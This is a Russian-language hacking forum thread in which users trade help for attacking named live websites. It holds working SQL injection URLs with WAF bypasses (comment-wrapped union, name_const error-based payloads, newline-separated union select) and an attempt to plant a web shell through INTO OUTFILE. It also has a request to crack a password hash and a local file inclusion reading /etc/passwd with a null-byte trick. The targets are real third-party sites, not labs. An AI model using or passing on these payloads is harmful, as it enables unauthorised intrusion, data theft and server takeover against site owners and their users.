17.03.2015, 13:20
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
И еще один, не выходит раскрутить, непонятно что и как фильтрует. Подскажите.
Сообщение от None
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=45+and+1=1 - true
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=45+and+2=0 - false
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=45+and+substr(@@version,1 ,1))=5 - false
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=45+and+substr(@@version,1 ,1))=4 - false
|
|
|
17.03.2015, 14:13
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Br@!ns
И еще один, не выходит раскрутить, непонятно что и как фильтрует. Подскажите.
Бегло осмотрел.
MQ on
Фильтруются запятые, служебные символы типа @
Скобки не фильтруются.
Попробуй функции, которым не нужна запятая в синтаксисе
Типа
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=45+and+49=(select+ascii(( 1)))
Опять же некоторые выборочно фильтруются. Функция Ord например.
Может быть, есть смысл пообходить ваф. Я сейчас не в тех условиях, когда могу генерировать траффик =)
Направление для мыслей дал.
|
|
|
|
18.03.2015, 17:36
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Как обойти сей WAF:
Код:
http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+order+by+8--
Задержка какая-то если использовать union select. |
|
|
|
18.03.2015, 17:39
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от MaxFast
Как обойти сей WAF:
Код:
http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+order+by+8--
Задержка какая-то если использовать union select. все стандартно:
Код:
http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+/*!union*/+select+1,2,3,4,5,version(),7,8--+
error-based:
Код:
http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+|%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29
главное, чтобы не было union (возможно что-то еще, не смотрел дальше)
|
|
|
|
18.03.2015, 17:43
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Сообщение от faza02
все стандартно:
Код:
http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+/*!union*/+select+1,2,3,4,5,version(),7,8--+
error-based:
Код:
http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+|%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29
главное, чтобы не было union (возможно что-то еще, не смотрел дальше) То есть задержка из-за union? Странные они. Я даже не подумал.
|
|
|
|
18.03.2015, 17:54
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от MaxFast
То есть задержка из-за union? Странные они. Я даже не подумал.
реакция на UNION вместе с SELECT. может пройти что-то одно из этого
можно еще так:
union%0Aselect или любым другим пробелом
|
|
|
|
20.03.2015, 18:14
|
|
Новичок
Регистрация: 14.07.2009
Сообщений: 4
С нами:
8855817
Репутация:
3
|
|
Всем привет, нужна помощь:
magic_quotes_gpc On On
file priv Y
если захексить кавычку, то она выводится на страницу, без ошибок(Into Outfile + двойной запрос не покатил)
через двойной запрос отображается +and+1=0+union+select+'',777+from+mysql.user+into+ outfile.., а между ковычек отображается к исходном коде, но в файл не записывается.
Есть еще способы залить шелл?
И если у кого есть большой словарь, расшифруйте:
f9fce403c946f20f5b0634d7fffcbbcf
з.ы полный путь естественно есть
криво описал
|
|
|
|
20.03.2015, 18:15
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Jamsho0T
Всем привет, нужна помощь:
magic_quotes_gpc
On On
file priv
Y
если захексить кавычку, то она выводится на страницу, без ошибок(Into Outfile + двойной запрос не покатил)
через двойной запрос отображается +and+1=0+union+select+'',777+from+mysql.user+into+ outfile.., а между ковычек
отображается к исходном коде, но в файл не записывается.
Есть еще способы залить шелл?
з.ы полный путь естественно есть
криво описал
чтобы указать путь до файла нужны реальные кавычки в нормальном виде
|
|
|
|
20.03.2015, 22:21
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
Здраствуйте. Нашел ошибку file inclusion. Но когда питаюсь подключить сайти или вывести файл etc/passwd получаю
Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd.html' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
подставляю %00 и получаю
Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
можно что нибудь сделать или уже ничего не вытащить?
|
|
|
|
20.03.2015, 22:27
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от teh
Здраствуйте. Нашел ошибку file inclusion. Но когда питаюсь подключить сайти или вывести файл etc/passwd получаю
Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd.html' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
подставляю %00 и получаю
Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
можно что нибудь сделать или уже ничего не вытащить?
incorrect_path/../../etc/passwd%00
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
